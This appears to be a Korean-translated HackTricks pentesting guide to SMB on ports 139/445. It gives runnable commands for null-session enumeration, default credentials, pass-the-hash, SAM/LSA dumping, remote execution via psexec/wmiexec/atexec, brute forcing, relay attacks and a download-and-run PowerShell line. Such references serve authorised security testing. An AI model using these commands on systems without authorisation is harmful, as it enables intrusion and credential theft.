# 139,445 - Pentesting SMB {{#include ../banners/hacktricks-training.md}} ## **Port 139** _**네트워크 기본 입출력 시스템**_** (NetBIOS)**는 애플리케이션, PC 및 데스크탑이 로컬 영역 네트워크(LAN) 내에서 네트워크 하드웨어와 상호 작용하고 **네트워크를 통한 데이터 전송을 용이하게 하기 위해 설계된 소프트웨어 프로토콜**입니다. NetBIOS 네트워크에서 작동하는 소프트웨어 애플리케이션의 식별 및 위치는 최대 16자 길이의 NetBIOS 이름을 통해 이루어지며, 이는 종종 컴퓨터 이름과 다릅니다. 두 애플리케이션 간의 NetBIOS 세션은 한 애플리케이션(클라이언트 역할)이 **TCP 포트 139**를 사용하여 다른 애플리케이션(서버 역할)을 "호출"하는 명령을 발행할 때 시작됩니다. ``` 139/tcp open netbios-ssn Microsoft Windows netbios-ssn ``` ## Port 445 기술적으로, 포트 139는 ‘NBT over IP’로 언급되며, 포트 445는 ‘SMB over IP’로 식별됩니다. 약어 **SMB**는 ‘**Server Message Blocks**’를 의미하며, 현대적으로는 **Common Internet File System (CIFS)**로 알려져 있습니다. 애플리케이션 계층 네트워크 프로토콜로서, SMB/CIFS는 주로 파일, 프린터, 직렬 포트에 대한 공유 액세스를 가능하게 하고, 네트워크의 노드 간 다양한 형태의 통신을 촉진하는 데 사용됩니다. 예를 들어, Windows의 맥락에서 SMB는 TCP/IP를 통해 직접 작동할 수 있으며, 이는 포트 445를 사용하여 TCP/IP를 통한 NetBIOS의 필요성을 제거합니다. 반대로, 다른 시스템에서는 포트 139의 사용이 관찰되며, 이는 SMB가 TCP/IP를 통한 NetBIOS와 함께 실행되고 있음을 나타냅니다. ``` 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) ``` ### SMB **서버 메시지 블록 (SMB)** 프로토콜은 **클라이언트-서버** 모델에서 작동하며, **파일**, 디렉토리 및 프린터와 라우터와 같은 기타 네트워크 리소스에 대한 **접근**을 규제하기 위해 설계되었습니다. 주로 **Windows** 운영 체제 시리즈 내에서 사용되며, SMB는 하위 호환성을 보장하여 Microsoft의 최신 운영 체제를 실행하는 장치가 이전 버전을 실행하는 장치와 원활하게 상호 작용할 수 있도록 합니다. 또한, **Samba** 프로젝트는 SMB를 **Linux** 및 Unix 시스템에서 구현할 수 있는 무료 소프트웨어 솔루션을 제공하여 SMB를 통한 크로스 플랫폼 통신을 촉진합니다. SMB 서버는 **로컬 파일 시스템의 임의 부분**을 나타내는 공유를 제공할 수 있으며, 이를 통해 클라이언트는 서버의 실제 구조와 부분적으로 **독립적인** 계층을 볼 수 있습니다. **접근 제어 목록 (ACLs)**은 **접근 권한**을 정의하며, **`execute`**, **`read`**, **`full access`**와 같은 속성을 포함하여 사용자 권한에 대한 **세밀한 제어**를 허용합니다. 이러한 권한은 공유를 기반으로 개별 사용자 또는 그룹에 할당될 수 있으며, 서버에서 설정된 로컬 권한과는 구별됩니다. ### IPC$ Share IPC$ 공유에 대한 접근은 익명 널 세션을 통해 얻을 수 있으며, 이를 통해 명명된 파이프를 통해 노출된 서비스와 상호 작용할 수 있습니다. 이 목적을 위해 `enum4linux` 유틸리티가 유용합니다. 적절히 사용하면 다음과 같은 정보를 획득할 수 있습니다: - 운영 체제에 대한 정보 - 상위 도메인에 대한 세부 정보 - 로컬 사용자 및 그룹의 목록 - 사용 가능한 SMB 공유에 대한 정보 - 효과적인 시스템 보안 정책 이 기능은 네트워크 관리자가 SMB (서버 메시지 블록) 서비스의 보안 상태를 평가하는 데 중요합니다. `enum4linux`는 대상 시스템의 SMB 환경에 대한 포괄적인 뷰를 제공하여 잠재적인 취약점을 식별하고 SMB 서비스가 적절하게 보호되고 있는지 확인하는 데 필수적입니다. ```bash enum4linux -a target_ip ``` 위의 명령은 `enum4linux`가 `target_ip`로 지정된 대상을 대상으로 전체 열거를 수행하는 방법의 예입니다. ## NTLM이란 NTLM이 무엇인지 모르거나 그것이 어떻게 작동하는지, 그리고 어떻게 악용할 수 있는지 알고 싶다면, **이 프로토콜이 어떻게 작동하는지와 이를 어떻게 활용할 수 있는지 설명하는** **NTLM**에 대한 이 페이지가 매우 흥미로울 것입니다: {{#ref}} ../windows-hardening/ntlm/ {{#endref}} ## **서버 열거** ### **호스트 검색을 위한** 네트워크 스캔: ```bash nbtscan -r 192.168.0.1/24 ``` ### SMB 서버 버전 SMB 버전에 대한 가능한 취약점을 찾으려면 어떤 버전이 사용되고 있는지 아는 것이 중요합니다. 이 정보가 다른 도구에서 나타나지 않는 경우, 다음을 사용할 수 있습니다: - **MSF** 보조 모듈 _**auxiliary/scanner/smb/smb_version**_ 사용 - 또는 이 스크립트: ```bash #!/bin/sh #Author: rewardone #Description: # Requires root or enough permissions to use tcpdump # Will listen for the first 7 packets of a null login # and grab the SMB Version #Notes: # Will sometimes not capture or will print multiple # lines. May need to run a second time for success. if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi if [ ! -z $2 ]; then rport=$2; else rport=139; fi tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " & echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null echo "" && sleep .1 ``` ### **검색 취약점** ```bash msf> search type:exploit platform:windows target:2008 smb searchsploit microsoft smb ``` ### **가능한** 자격 증명 | **사용자 이름** | **일반 비밀번호** | | -------------------- | --------------------------------------- | | _(빈칸)_ | _(빈칸)_ | | 게스트 | _(빈칸)_ | | 관리자, admin | _(빈칸)_, 비밀번호, 관리자, admin | | arcserve | arcserve, 백업 | | tivoli, tmersrvd | tivoli, tmersrvd, admin | | backupexec, backup | backupexec, 백업, arcada | | test, lab, demo | 비밀번호, test, lab, demo | ### 무차별 대입 공격 - [**SMB 무차별 대입 공격**](../generic-methodologies-and-resources/brute-force.md#smb) ### SMB 환경 정보 ### 정보 획득 ```bash #Dump interesting information enum4linux -a [-u "" -p ""] enum4linux-ng -A [-u "" -p ""] nmap --script "safe or smb-enum-*" -p 445 #Connect to the rpc rpcclient -U "" -N #No creds rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash rpcclient -U "username%passwd" #With creds #You can use querydispinfo and enumdomusers to query user information #Dump user information /usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@] /usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@] #Map possible RPC endpoints /usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@] /usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@] /usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@] ``` ### 사용자, 그룹 및 로그인한 사용자 열거 이 정보는 이미 enum4linux 및 enum4linux-ng에서 수집되어야 합니다. ```bash crackmapexec smb 10.10.10.10 --users [-u -p ] crackmapexec smb 10.10.10.10 --groups [-u -p ] crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u -p ] ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " " rpcclient -U "" -N 10.10.10.10 enumdomusers enumdomgroups ``` ### 로컬 사용자 나열 [Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py) ```bash lookupsid.py -no-pass hostname.local ``` 원라이너 ```bash for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done ``` ### Metasploit - 로컬 사용자 열거 ```bash use auxiliary/scanner/smb/smb_lookupsid set rhosts hostname.local run ``` ### **LSARPC 및 SAMR rpcclient 열거하기** {{#ref}} pentesting-smb/rpcclient-enumeration.md {{#endref}} ### 리눅스에서 GUI 연결 #### 터미널에서: `xdg-open smb://cascade.htb/` #### 파일 브라우저 창에서 (nautilus, thunar 등) `smb://friendzone.htb/general/` ## 공유 폴더 열거하기 ### 공유 폴더 목록 항상 접근할 수 있는지 확인하는 것이 좋습니다. 자격 증명이 없는 경우 **null** **자격 증명/게스트 사용자**를 사용해 보십시오. ```bash smbclient --no-pass -L // # Null user smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash smbmap -H [-P ] #Null user smbmap -u "username" -p "password" -H [-P ] #Creds smbmap -u "username" -p ":" -H [-P ] #Pass-the-Hash smbmap -R -u "username" -p "password" -H [-P ] #Recursive list crackmapexec smb -u '' -p '' --shares #Null user crackmapexec smb -u 'username' -p 'password' --shares #Guest user crackmapexec smb -u 'username' -H '' --shares #Guest user ``` ### **공유 폴더 연결/목록** ```bash #Connect using smbclient smbclient --no-pass /// smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash #Use --no-pass -c 'recurse;ls' to list recursively with smbclient #List with smbmap, without folder it list everything smbmap [-u "username" -p "password"] -R [Folder] -H [-P ] # Recursive list smbmap [-u "username" -p "password"] -r [Folder] -H [-P ] # Non-Recursive list smbmap -u "username" -p ":" [-r/-R] [Folder] -H [-P ] #Pass-the-Hash ``` ### **수동으로 윈도우 공유를 열거하고 연결하기** 호스트 머신의 공유를 표시하는 데 제한이 있을 수 있으며, 이를 나열하려고 할 때 연결할 수 있는 공유가 없는 것처럼 보일 수 있습니다. 따라서 공유에 수동으로 연결해 보려는 시도가 가치가 있을 수 있습니다. 공유를 수동으로 열거하려면 유효한 세션(예: null 세션 또는 유효한 자격 증명)을 사용할 때 NT_STATUS_ACCESS_DENIED 및 NT_STATUS_BAD_NETWORK_NAME와 같은 응답을 찾아보는 것이 좋습니다. 이는 공유가 존재하지만 접근할 수 없거나 공유가 전혀 존재하지 않음을 나타낼 수 있습니다. 윈도우 타겟의 일반적인 공유 이름은 다음과 같습니다. - C$ - D$ - ADMIN$ - IPC$ - PRINT$ - FAX$ - SYSVOL - NETLOGON (_**Network Security Assessment 3rd edition**_의 일반적인 공유 이름) 다음 명령어를 사용하여 이들에 연결해 볼 수 있습니다. ```bash smbclient -U '%' -N \\\\\\ # null session to connect to a windows share smbclient -U '' \\\\\\ # authenticated session to connect to a windows share (you will be prompted for a password) ``` 이 스크립트(널 세션 사용) ```bash #/bin/bash ip='' shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON') for share in ${shares[*]}; do output=$(smbclient -U '%' -N \\\\$ip\\$share -c '') if [[ -z $output ]]; then echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created else echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME) fi done ``` 예시 ```bash smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session ``` ### **Windows에서 공유 목록 열기 / 서드파티 도구 없이** PowerShell ```bash # Retrieves the SMB shares on the locale computer. Get-SmbShare Get-WmiObject -Class Win32_Share # Retrieves the SMB shares on a remote computer. get-smbshare -CimSession "" # Retrieves the connections established from the local SMB client to the SMB servers. Get-SmbConnection ``` CMD 콘솔 ```shell # List shares on the local computer net share # List shares on a remote computer (including hidden ones) net view \\ /all ``` MMC 스냅인 (그래픽) ```shell # Shared Folders: Shared Folders > Shares fsmgmt.msc # Computer Management: Computer Management > System Tools > Shared Folders > Shares compmgmt.msc ``` explorer.exe (그래픽), `\\\`를 입력하여 사용 가능한 비공유 폴더를 확인합니다. ### 공유 폴더 마운트 ```bash mount -t cifs //x.x.x.x/share /mnt/share mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share ``` ### **파일 다운로드** 이전 섹션을 읽어 자격 증명/Pass-the-Hash로 연결하는 방법을 배우십시오. ```bash #Search a file and download sudo smbmap -R Folder -H -A -q # Search the file in recursive mode and download it inside /usr/share/smbmap ``` ```bash #Download all smbclient /// > mask "" > recurse > prompt > mget * #Download everything to current directory ``` 명령어: - mask: 디렉토리 내 파일을 필터링하는 데 사용되는 마스크를 지정합니다 (예: ""는 모든 파일에 해당) - recurse: 재귀를 켭니다 (기본값: 꺼짐) - prompt: 파일 이름에 대한 프롬프트를 끕니다 (기본값: 켜짐) - mget: 호스트에서 클라이언트 머신으로 마스크와 일치하는 모든 파일을 복사합니다 (_smbclient의 매뉴얼 페이지에서 정보_) ### 도메인 공유 폴더 검색 - [**Snaffler**](https://github.com/SnaffCon/Snaffler) ```bash Snaffler.exe -s -d domain.local -o snaffler.log -v data ``` - [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) 스파이더. - `-M spider_plus [--share ]` - `--pattern txt` ```bash sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares' ``` 특히 흥미로운 공유는 **`Registry.xml`** 파일로, 이는 **autologon**으로 구성된 사용자에 대한 비밀번호를 포함할 수 있습니다. 또는 **`web.config`** 파일은 자격 증명을 포함하고 있습니다. - [**PowerHuntShares**](https://github.com/NetSPI/PowerHuntShares) - `IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")` - `Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test` > [!NOTE] > **SYSVOL 공유**는 도메인 내 모든 인증된 사용자가 **읽을 수** 있습니다. 그 안에는 다양한 배치, VBScript 및 PowerShell **스크립트**가 있을 수 있습니다.\ > 그 안의 **스크립트**를 **확인**해야 하며, **비밀번호**와 같은 민감한 정보를 **찾을** 수 있습니다. ## 레지스트리 읽기 발견된 자격 증명을 사용하여 **레지스트리**를 **읽을 수** 있습니다. Impacket **`reg.py`**를 사용하여 시도할 수 있습니다: ```bash sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s ``` ## Post Exploitation **Samba** 서버의 **기본 구성**은 일반적으로 `/etc/samba/smb.conf`에 위치하며, 몇 가지 **위험한 구성**이 있을 수 있습니다: | **설정** | **설명** | | --------------------------- | ------------------------------------------------------------------- | | `browseable = yes` | 현재 공유에서 사용 가능한 공유 목록을 허용합니까? | | `read only = no` | 파일의 생성 및 수정을 금지합니까? | | `writable = yes` | 사용자가 파일을 생성하고 수정할 수 있도록 허용합니까? | | `guest ok = yes` | 비밀번호 없이 서비스에 연결할 수 있도록 허용합니까? | | `enable privileges = yes` | 특정 SID에 할당된 권한을 존중합니까? | | `create mask = 0777` | 새로 생성된 파일에 어떤 권한이 할당되어야 합니까? | | `directory mask = 0777` | 새로 생성된 디렉토리에 어떤 권한이 할당되어야 합니까? | | `logon script = script.sh` | 사용자의 로그인 시 실행해야 하는 스크립트는 무엇입니까? | | `magic script = script.sh` | 스크립트가 종료될 때 실행해야 하는 스크립트는 무엇입니까? | | `magic output = script.out` | 마법 스크립트의 출력이 저장되어야 하는 위치는 어디입니까? | `smbstatus` 명령은 **서버** 및 **누가 연결되어 있는지**에 대한 정보를 제공합니다. ## Authenticate using Kerberos **smbclient** 및 **rpcclient** 도구를 사용하여 **kerberos**에 **인증**할 수 있습니다: ```bash smbclient --kerberos //ws01win10.domain.com/C$ rpcclient -k ws01win10.domain.com ``` ## **명령 실행** ### **crackmapexec** crackmapexec는 **wmiexec**가 **기본** 방법인 **mmcexec, smbexec, atexec, wmiexec**를 **악용하여** 명령을 실행할 수 있습니다. 사용할 옵션을 `--exec-method` 매개변수로 지정할 수 있습니다: ```bash apt-get install crackmapexec crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd crackmapexec smb 192.168.10.11 -u Administrator -H -x whoami #Pass-the-Hash # Using --exec-method {mmcexec,smbexec,atexec,wmiexec} crackmapexec smb -d -u Administrator -p 'password' --sam #Dump SAM crackmapexec smb -d -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes crackmapexec smb -d -u Administrator -p 'password' --sessions #Get sessions ( crackmapexec smb -d -u Administrator -p 'password' --loggedon-users #Get logged-on users crackmapexec smb -d -u Administrator -p 'password' --disks #Enumerate the disks crackmapexec smb -d -u Administrator -p 'password' --users #Enumerate users crackmapexec smb -d -u Administrator -p 'password' --groups # Enumerate groups crackmapexec smb -d -u Administrator -p 'password' --local-groups # Enumerate local groups crackmapexec smb -d -u Administrator -p 'password' --pass-pol #Get password policy crackmapexec smb -d -u Administrator -p 'password' --rid-brute #RID brute crackmapexec smb -d -u Administrator -H #Pass-The-Hash ``` ### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md) 두 옵션은 **새 서비스를 생성**합니다 (_\pipe\svcctl_을 사용하여 SMB를 통해) 피해자 머신에서 이를 사용하여 **무언가를 실행**합니다 (**psexec**는 **실행 파일을 ADMIN$ 공유에 업로드**하고 **smbexec**는 **cmd.exe/powershell.exe**를 가리키며 인수에 페이로드를 넣습니다 --**파일 없는 기법-**-).\ **자세한 정보**는 [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)와 [**smbexec**](../windows-hardening/ntlm/smbexec.md)를 참조하세요.\ **kali**에서는 /usr/share/doc/python3-impacket/examples/에 위치해 있습니다. ```bash #If no password is provided, it will be prompted ./psexec.py [[domain/]username[:password]@] ./psexec.py -hashes administrator@10.10.10.103 #Pass-the-Hash psexec \\192.168.122.66 -u Administrator -p 123456Ww psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash ``` **매개변수**`-k`를 사용하면 **kerberos**를 통해 **NTLM** 대신 인증할 수 있습니다. ### [wmiexec](../windows-hardening/ntlm/wmiexec.md)/dcomexec 디스크를 건드리거나 새로운 서비스를 실행하지 않고 **포트 135**를 통해 DCOM을 사용하여 명령 셸을 은밀하게 실행합니다.\ **kali**에서는 /usr/share/doc/python3-impacket/examples/에 위치해 있습니다. ```bash #If no password is provided, it will be prompted ./wmiexec.py [[domain/]username[:password]@] #Prompt for password ./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted ``` **매개변수**`-k`를 사용하면 **NTLM** 대신 **kerberos**에 대해 인증할 수 있습니다. ```bash #If no password is provided, it will be prompted ./dcomexec.py [[domain/]username[:password]@] ./dcomexec.py -hashes administrator@10.10.10.103 #Pass-the-Hash #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted ``` ### [AtExec](../windows-hardening/ntlm/atexec.md) SMB를 통해 Task Scheduler를 통해 명령을 실행합니다 (_\pipe\atsvc_ 사용).\ **kali**에서는 /usr/share/doc/python3-impacket/examples/에 위치해 있습니다. ```bash ./atexec.py [[domain/]username[:password]@] "command" ./atexec.py -hashes administrator@10.10.10.175 "whoami" ``` ## Impacket reference [https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/) ## **사용자 자격 증명 무차별 대입** **권장하지 않습니다. 최대 허용 시도를 초과하면 계정이 차단될 수 있습니다.** ```bash nmap --script smb-brute -p 445 ridenum.py 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name ``` ## SMB 릴레이 공격 이 공격은 Responder 툴킷을 사용하여 **내부 네트워크에서 SMB 인증 세션을 캡처**하고, 이를 **대상 머신**으로 **중계**합니다. 인증 **세션이 성공하면**, 자동으로 **시스템** **셸**로 진입하게 됩니다.\ [**이 공격에 대한 더 많은 정보는 여기에서 확인하세요.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) ## SMB-Trap Windows 라이브러리 URLMon.dll은 페이지가 SMB를 통해 일부 콘텐츠에 접근하려고 할 때 자동으로 호스트에 인증을 시도합니다. 예를 들어: `img src="\\10.10.10.10\path\image.jpg"` 이는 다음 함수에서 발생합니다: - URLDownloadToFile - URLDownloadToCache - URLOpenStream - URLOpenBlockingStream 일부 브라우저와 도구(예: Skype)에서 사용됩니다. ![출처: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../images/image (93).png>) ### MitMf를 이용한 SMBTrap ![출처: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../images/image (94).png>) ## NTLM 탈취 SMB 트래핑과 유사하게, 악성 파일을 대상 시스템에 심으면(SMB를 통해 예를 들어) SMB 인증 시도가 발생할 수 있으며, 이를 통해 NetNTLMv2 해시를 Responder와 같은 도구로 가로챌 수 있습니다. 해시는 오프라인에서 크랙되거나 [SMB 릴레이 공격](pentesting-smb.md#smb-relay-attack)에 사용될 수 있습니다. [참조: ntlm_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft) ## HackTricks 자동 명령 ``` Protocol_Name: SMB #Protocol Abbreviation if there is one. Port_Number: 137,138,139 #Comma separated if there is more than one. Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out Entry_1: Name: Notes Description: Notes for SMB Note: | While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network. #These are the commands I run in order every time I see an open SMB port With No Creds nbtscan {IP} smbmap -H {IP} smbmap -H {IP} -u null -p null smbmap -H {IP} -u guest smbclient -N -L //{IP} smbclient -N //{IP}/ --option="client min protocol"=LANMAN1 rpcclient {IP} rpcclient -U "" {IP} crackmapexec smb {IP} crackmapexec smb {IP} --pass-pol -u "" -p "" crackmapexec smb {IP} --pass-pol -u "guest" -p "" GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/" getArch.py -target {IP} With Creds smbmap -H {IP} -u {Username} -p {Password} smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash` crackmapexec smb {IP} -u {Username} -p {Password} --shares GetADUsers.py {Domain_Name}/{Username}:{Password} -all GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html Entry_2: Name: Enum4Linux Description: General SMB Scan Command: enum4linux -a {IP} Entry_3: Name: Nmap SMB Scan 1 Description: SMB Vuln Scan With Nmap Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP} Entry_4: Name: Nmap Smb Scan 2 Description: SMB Vuln Scan With Nmap (Less Specific) Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP} Entry_5: Name: Hydra Brute Force Description: Need User Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb Entry_6: Name: SMB/SMB2 139/445 consolesless mfs enumeration Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole Note: sourced from https://github.com/carlospolop/legion Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit' ``` {{#include ../banners/hacktricks-training.md}}